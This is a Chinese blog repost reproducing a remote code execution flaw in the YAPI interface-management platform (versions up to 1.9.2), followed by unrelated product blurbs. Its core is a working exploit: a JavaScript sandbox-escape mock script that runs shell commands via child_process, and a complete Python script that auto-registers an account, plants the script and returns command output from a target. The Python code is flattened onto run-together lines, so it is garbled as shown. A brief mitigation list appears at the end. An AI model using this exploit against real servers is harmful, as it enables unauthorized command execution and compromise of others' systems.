YAPI接口管理平台RCE复现-附exp

2024-04-22 19:38

本文主要是介绍YAPI接口管理平台RCE复现-附exp,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

  • 漏洞简介
  • 影响版本
  • 漏洞复现
    • 手工验证
    • EXP验证
  • 漏洞防御

漏洞简介

YAPI是由去哪儿网移动架构组开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。
漏洞存在于YAPI的mock脚本服务上,是由于mock脚本自定义服务未对JS脚本的命令过滤,用户可以添加任何请求处理脚本,攻击者可利用该漏洞在受影响的服务器上执行任意JS代码。


影响版本

YAPI <= 1.9.2


漏洞复现

手工验证

1、注册账号
在这里插入图片描述
在这里插入图片描述


2、登录后新建项目
在这里插入图片描述在这里插入图片描述


3、设置全局mock脚本及接口
在这里插入图片描述
JS代码如下:

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami && ls").toString()

4、添加接口
在这里插入图片描述在这里插入图片描述


5、访问mock接口地址,命令执行成功
在这里插入图片描述


EXP验证

python yapi.py -u x.x.x.x -e whoami

在这里插入图片描述代码如下:

# -*- coding: utf-8 -*-import jsonimport requests
import argparsegroup_id = ''
project_id = ''
catid = ''
flag=1def reg(gurl):global flagurl = gurl + "/api/user/reg"header = {'Content-Type': 'application/json;charset=utf-8'}data = '{"email":"zxcc@zxcc.com","password":"zxcczxcc","username":"zxcc"}'rego = requests.post(url=url, headers=header, data=data)# print(rego.text)if str(400) in rego.text:flag = 0session = requests.Session()def login(gurl):url = gurl + "/api/user/login"header = {'Content-Type': 'application/json;charset=utf-8'}data = '{"email":"zxcc@zxcc.com","password":"zxcczxcc"}'logingo = session.post(url=url, headers=header, data=data)# print(logingo.text)# print(session.__dict__)def add(gurl):global group_id, project_id, catidheader = {'Content-Type': 'application/json;charset=utf-8'}turl = gurl + "/api/group/get_mygroup"t1 = session.get(url=turl)group_id = json.loads(t1.text)['data']['_id']url1 = gurl + "/api/project/add"data1 = '{"name":"1","basepath":"/1","group_id":"' + str(group_id) + '","icon":"code-o","color":"green","project_type":"private"}'add1 = session.post(url=url1, headers=header, data=data1)turl2 = gurl + "/api/project/list?group_id=" + str(group_id) + "&page=1&limit=10"t2 = session.get(url=turl2)project_id = json.loads(t2.text)['data']['list'][0]['_id']turl3 = gurl + "/api/interface/list_menu?project_id=" + str(project_id) + ""t3 = session.get(url=turl3)catid = json.loads(t3.text)['data'][0]['_id']url2 = gurl + "/api/interface/add"data2 = '{"method":"GET","catid":"' + str(catid) + '","title":"1","path":"/1","project_id":' + str(project_id) + '}'# print(data1)add2 = session.post(url=url2, headers=header, data=data2)# print(add1.text)# print(add2.text)def run(gurl, exec):turl = gurl + "/api/interface/list?page=1&limit=20&project_id=" + str(project_id) + ""t1 = session.get(url=turl)interface_id = json.loads(t1.text)['data']['list'][0]['_id']url = gurl + "/api/plugin/advmock/save"data = '''{"project_id":"''' + str(project_id) + '''","interface_id":"''' + str(interface_id) + '''","mock_script":"const sandbox = this\\nconst ObjectConstructor = this.constructor\\nconst FunctionConstructor = ObjectConstructor.constructor\\nconst myfun = FunctionConstructor('return process')\\nconst process = myfun()\\nmockJson = process.mainModule.require(\\"child_process\\").execSync(\\"''' + exec + '''\\").toString()","enable":true}'''header = {'Content-Type': 'application/json;charset=utf-8'}cmd = session.post(url=url, data=data, headers=header)# print(cmd.text)result = requests.get(url=gurl + "/mock/" + str(project_id) + "/1/1")print(result.text)if __name__ == '__main__':parser = argparse.ArgumentParser(description="Yapi RCE , need register mode open")parser.add_argument('-u', '--url')parser.add_argument('-e', '--exec', default='whoami & ifconfig || ipconfig')args = parser.parse_args()gurl = str(args.url).rstrip('/')exec = args.execif args.url :# print(gurl)reg(gurl)if flag:login(gurl)add(gurl)run(gurl, exec)else:print('Not support register !')else:print('Need The Target,please add -h / --help')# print(group_id, project_id, catid, '123')

漏洞防御

1、更改Yapi运行端口

2、使用Nginx对Yapi进行反向代理

3、安全组只开放Nginx端口,你可以在Nginx限制IP白名单。

4、关闭Yapi注册

5、关闭Yapi Mock


参考文章:
感谢Azeng师傅提供的EXP
参考微信公众号:星期五实验室

这篇关于YAPI接口管理平台RCE复现-附exp的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/926684

相关文章

流媒体平台/视频监控/安防视频汇聚EasyCVR播放暂停后视频画面黑屏是什么原因?

视频智能分析/视频监控/安防监控综合管理系统EasyCVR视频汇聚融合平台,是TSINGSEE青犀视频垂直深耕音视频流媒体技术、AI智能技术领域的杰出成果。该平台以其强大的视频处理、汇聚与融合能力,在构建全栈视频监控系统中展现出了独特的优势。视频监控管理系统EasyCVR平台内置了强大的视频解码、转码、压缩等技术,能够处理多种视频流格式,并以多种格式(RTMP、RTSP、HTTP-FLV、WebS

综合安防管理平台LntonAIServer视频监控汇聚抖动检测算法优势

LntonAIServer视频质量诊断功能中的抖动检测是一个专门针对视频稳定性进行分析的功能。抖动通常是指视频帧之间的不必要运动,这种运动可能是由于摄像机的移动、传输中的错误或编解码问题导致的。抖动检测对于确保视频内容的平滑性和观看体验至关重要。 优势 1. 提高图像质量 - 清晰度提升:减少抖动,提高图像的清晰度和细节表现力,使得监控画面更加真实可信。 - 细节增强:在低光条件下,抖

JAVA智听未来一站式有声阅读平台听书系统小程序源码

智听未来,一站式有声阅读平台听书系统 🌟&nbsp;开篇:遇见未来,从“智听”开始 在这个快节奏的时代,你是否渴望在忙碌的间隙,找到一片属于自己的宁静角落?是否梦想着能随时随地,沉浸在知识的海洋,或是故事的奇幻世界里?今天,就让我带你一起探索“智听未来”——这一站式有声阅读平台听书系统,它正悄悄改变着我们的阅读方式,让未来触手可及! 📚&nbsp;第一站:海量资源,应有尽有 走进“智听

如何解决线上平台抽佣高 线下门店客流少的痛点!

目前,许多传统零售店铺正遭遇客源下降的难题。尽管广告推广能带来一定的客流,但其费用昂贵。鉴于此,众多零售商纷纷选择加入像美团、饿了么和抖音这样的大型在线平台,但这些平台的高佣金率导致了利润的大幅缩水。在这样的市场环境下,商家之间的合作网络逐渐成为一种有效的解决方案,通过资源和客户基础的共享,实现共同的利益增长。 以最近在上海兴起的一个跨行业合作平台为例,该平台融合了环保消费积分系统,在短

Android平台播放RTSP流的几种方案探究(VLC VS ExoPlayer VS SmartPlayer)

技术背景 好多开发者需要遴选Android平台RTSP直播播放器的时候,不知道如何选的好,本文针对常用的方案,做个大概的说明: 1. 使用VLC for Android VLC Media Player(VLC多媒体播放器),最初命名为VideoLAN客户端,是VideoLAN品牌产品,是VideoLAN计划的多媒体播放器。它支持众多音频与视频解码器及文件格式,并支持DVD影音光盘,VCD影

软考系统规划与管理师考试证书含金量高吗?

2024年软考系统规划与管理师考试报名时间节点: 报名时间:2024年上半年软考将于3月中旬陆续开始报名 考试时间:上半年5月25日到28日,下半年11月9日到12日 分数线:所有科目成绩均须达到45分以上(包括45分)方可通过考试 成绩查询:可在“中国计算机技术职业资格网”上查询软考成绩 出成绩时间:预计在11月左右 证书领取时间:一般在考试成绩公布后3~4个月,各地领取时间有所不同

安全管理体系化的智慧油站开源了。

AI视频监控平台简介 AI视频监控平台是一款功能强大且简单易用的实时算法视频监控系统。它的愿景是最底层打通各大芯片厂商相互间的壁垒,省去繁琐重复的适配流程,实现芯片、算法、应用的全流程组合,从而大大减少企业级应用约95%的开发成本。用户只需在界面上进行简单的操作,就可以实现全视频的接入及布控。摄像头管理模块用于多种终端设备、智能设备的接入及管理。平台支持包括摄像头等终端感知设备接入,为整个平台提

【区块链 + 人才服务】区块链集成开发平台 | FISCO BCOS应用案例

随着区块链技术的快速发展,越来越多的企业开始将其应用于实际业务中。然而,区块链技术的专业性使得其集成开发成为一项挑战。针对此,广东中创智慧科技有限公司基于国产开源联盟链 FISCO BCOS 推出了区块链集成开发平台。该平台基于区块链技术,提供一套全面的区块链开发工具和开发环境,支持开发者快速开发和部署区块链应用。此外,该平台还可以提供一套全面的区块链开发教程和文档,帮助开发者快速上手区块链开发。

K8S(Kubernetes)开源的容器编排平台安装步骤详解

K8S(Kubernetes)是一个开源的容器编排平台,用于自动化部署、扩展和管理容器化应用程序。以下是K8S容器编排平台的安装步骤、使用方式及特点的概述: 安装步骤: 安装Docker:K8S需要基于Docker来运行容器化应用程序。首先要在所有节点上安装Docker引擎。 安装Kubernetes Master:在集群中选择一台主机作为Master节点,安装K8S的控制平面组件,如AP

衡石分析平台使用手册-单机安装及启动

单机安装及启动​ 本文讲述如何在单机环境下进行 HENGSHI SENSE 安装的操作过程。 在安装前请确认网络环境,如果是隔离环境,无法连接互联网时,请先按照 离线环境安装依赖的指导进行依赖包的安装,然后按照本文的指导继续操作。如果网络环境可以连接互联网,请直接按照本文的指导进行安装。 准备工作​ 请参考安装环境文档准备安装环境。 配置用户与安装目录。 在操作前请检查您是否有 sud